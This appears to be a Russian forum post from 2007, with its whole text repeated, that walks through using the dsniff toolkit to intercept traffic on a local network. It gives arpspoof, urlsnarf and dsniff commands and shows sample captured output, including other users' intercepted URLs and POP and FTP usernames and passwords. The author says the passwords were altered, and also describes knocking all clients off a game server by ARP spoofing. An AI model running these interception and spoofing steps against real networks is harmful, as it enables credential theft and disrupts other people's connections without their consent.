fYt
19.03.2007, 02:42
Простой сниффинг в локальных сетях с помощью Dsniff.
Прочитав в книге о сниффинге и увидев название этого пакета, сразу же решил его поставить и затестить. Прежде всего, мне понравилась функциональность, простота использования, набор дополнительных программ. Что же умеет этот сниффер?
Перехват паролей (POP, FTP, HTTP, SMTP, NIS, ICQ, …)
Перехват сеансов (ICQ, AIM, IRC)
Перехват электронной почты (POP,SMTP)
Перехват URL`браузеров.
Arp – спуффинг и флудинг.
Перехват файлов NFS.
Атаки mitm.
Если честно я не смог испытать и попробовать все, но некоторые вещи получились, и хотел бы описать их для тех, кому интересно.
Химический состав:
Arpspoof , Urlsnarf, Dsniff, Mailsnarf, Msgsnarf, Macof, Sshmitm, Webmitm, Filesnarf, Tcpkill, Dnsspoff.
Не много об использовании.
Arpspoof, спуфит указанный вами ip-адрес.
Пример:
arpspoof <IP>
arpspoof 192.168.0.2
У этого компьютера будет, выходит сообщение, что ip-адрес занят и используется в сети, при этом иногда нарушается работа некоторых сетевых программ. К примеру, спуфинг кс-сервака закончился диссконектом всех клиентов.:)
Urlsnarf, перехват URL. Просто запускаем и ждем, все выводится прямо на экран, можно перенаправить в файл.
Пример:
urlsnarf > url.log( Ждем…)
192.168.21.21 - - [19/Mar/2007:02:58:30 +0300] "GET http://club.itdrom.com/gallery/gal_source/delphi/d-a-p2 HTTP/1.1" - - "http://club.itdrom.com/gallery/gal_source/delphi/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
Что нам дают эти на первый взгляд не нужные url? Можно узнать пароли к некоторым сайтам, где бывает человек, версии ОС, браузера.
Dsniff, основной сниффер, перехват POP, AIM, HTTP, FTP, NIS, NNTP…. Использовать лучше в фоне, а вывод направить в файл.
Пример:
nohup dsniff 2>1 >> ds.log &
03/19/07 00:30:13 tcp 192.168.4.66.1044 -> 64.12.200.89.5190 (aim)
418823169
18
03/19/07 02:56:03 tcp 192.168.2.61.1744 -> 194.67.23.102.110 (pop)
USER daniil98
PASS 1234567890
03/19/07 02:16:26 tcp 192.168.2.61.1540 -> 213.24.222.132.21 (ftp)
USER fc1
PASS fc1
После 15 минут сниффинга результат неплохой.
Остальные утилиты:
Macof - arp-флудер сети.
Dnsspoof – подделывает PTR-записи DNS(??).
Filesnarf – перехватывает файлы по NFS.
Msgsnarf – перехват сообщений IRC, ICQ, AIM (не знаю почему так и не заработал…)
Mailsnarf – перехват почты POP, SMTP. (ноу эффект…)
Sshmitm – какая-то сложная атака перехвата сеансов на SSH (не пробовал, да и врятли это получится…)
Webmitm – тоже только для web.
Некоторые моменты:
Я думаю установка сниффера не вызовет у вас проблем, в моей системе это apt-get install dsniff.
Сниффинг происходил на свитче, к которому подключен шлюз.
Во все пароли я добавил изменения.
download_dsniff (http://monkey.org/~dugsong/dsniff)
Ну вот и все, пока. fYt
Прочитав в книге о сниффинге и увидев название этого пакета, сразу же решил его поставить и затестить. Прежде всего, мне понравилась функциональность, простота использования, набор дополнительных программ. Что же умеет этот сниффер?
Перехват паролей (POP, FTP, HTTP, SMTP, NIS, ICQ, …)
Перехват сеансов (ICQ, AIM, IRC)
Перехват электронной почты (POP,SMTP)
Перехват URL`браузеров.
Arp – спуффинг и флудинг.
Перехват файлов NFS.
Атаки mitm.
Если честно я не смог испытать и попробовать все, но некоторые вещи получились, и хотел бы описать их для тех, кому интересно.
Химический состав:
Arpspoof , Urlsnarf, Dsniff, Mailsnarf, Msgsnarf, Macof, Sshmitm, Webmitm, Filesnarf, Tcpkill, Dnsspoff.
Не много об использовании.
Arpspoof, спуфит указанный вами ip-адрес.
Пример:
arpspoof <IP>
arpspoof 192.168.0.2
У этого компьютера будет, выходит сообщение, что ip-адрес занят и используется в сети, при этом иногда нарушается работа некоторых сетевых программ. К примеру, спуфинг кс-сервака закончился диссконектом всех клиентов.:)
Urlsnarf, перехват URL. Просто запускаем и ждем, все выводится прямо на экран, можно перенаправить в файл.
Пример:
urlsnarf > url.log( Ждем…)
192.168.21.21 - - [19/Mar/2007:02:58:30 +0300] "GET http://club.itdrom.com/gallery/gal_source/delphi/d-a-p2 HTTP/1.1" - - "http://club.itdrom.com/gallery/gal_source/delphi/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
Что нам дают эти на первый взгляд не нужные url? Можно узнать пароли к некоторым сайтам, где бывает человек, версии ОС, браузера.
Dsniff, основной сниффер, перехват POP, AIM, HTTP, FTP, NIS, NNTP…. Использовать лучше в фоне, а вывод направить в файл.
Пример:
nohup dsniff 2>1 >> ds.log &
03/19/07 00:30:13 tcp 192.168.4.66.1044 -> 64.12.200.89.5190 (aim)
418823169
18
03/19/07 02:56:03 tcp 192.168.2.61.1744 -> 194.67.23.102.110 (pop)
USER daniil98
PASS 1234567890
03/19/07 02:16:26 tcp 192.168.2.61.1540 -> 213.24.222.132.21 (ftp)
USER fc1
PASS fc1
После 15 минут сниффинга результат неплохой.
Остальные утилиты:
Macof - arp-флудер сети.
Dnsspoof – подделывает PTR-записи DNS(??).
Filesnarf – перехватывает файлы по NFS.
Msgsnarf – перехват сообщений IRC, ICQ, AIM (не знаю почему так и не заработал…)
Mailsnarf – перехват почты POP, SMTP. (ноу эффект…)
Sshmitm – какая-то сложная атака перехвата сеансов на SSH (не пробовал, да и врятли это получится…)
Webmitm – тоже только для web.
Некоторые моменты:
Я думаю установка сниффера не вызовет у вас проблем, в моей системе это apt-get install dsniff.
Сниффинг происходил на свитче, к которому подключен шлюз.
Во все пароли я добавил изменения.
download_dsniff (http://monkey.org/~dugsong/dsniff)
Ну вот и все, пока. fYt